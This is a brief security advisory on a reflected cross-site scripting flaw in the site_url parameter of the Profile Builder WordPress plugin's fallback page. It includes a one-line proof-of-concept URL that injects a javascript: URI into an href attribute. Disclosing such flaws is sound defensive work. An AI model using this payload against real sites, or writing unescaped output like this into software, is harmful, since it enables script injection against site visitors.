The plugin does not properly sanitise and escape the site_url parameter before outputting it back in an href attribute, leading to a Reflected Cross-Site Scripting issue
PoC
https://example.com/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(`XSS`);&message;=Page Not%Found&site;_name=404